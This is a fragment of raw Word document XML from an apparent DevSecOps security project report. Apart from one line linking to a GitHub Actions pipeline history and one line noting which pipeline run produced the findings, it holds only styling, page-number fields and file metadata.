    </w:p>
    <w:p w14:paraId="05DF0E8E">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pipeline history: https://github.com/QasimShakir/CyberSecurity_Project/actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA4BD5">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pipeline run #2 (commit b34b693) produced all findings documented in this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A38ED">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FA1788">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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20B8D">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="7F8C8D"/>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5BB2E">
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>The Shelf — DevSecOps Security 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2B50BD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="902B50BD"/>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documentProtection w:enforcement="0"/>
  <w:compat>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="17005D62"/>
    <w:rsid w:val="3B2011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2C3E50"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A5276"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2980B9"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E5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2C3E5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2C3E50"/>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2C3E50"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="2C3E50"/>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1734</Words>
  <Characters>11397</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12872</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2026-05-08T09:47:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>Jotesh Kumar</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-08T09:50:46Z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eyJoZGlkIjoiYzY1MGQyZTgyNWQzYTI3MTZjOTBjMjNkZTYxNWZkODIiLCJ1c2VySWQiOiIxOTQyMDEwMzIyNjcxIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.25862</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>44E1F5E89A7F44FB830916EFE9B8FB89_12</vt:lpwstr>
  </property>
</Properties>
</file>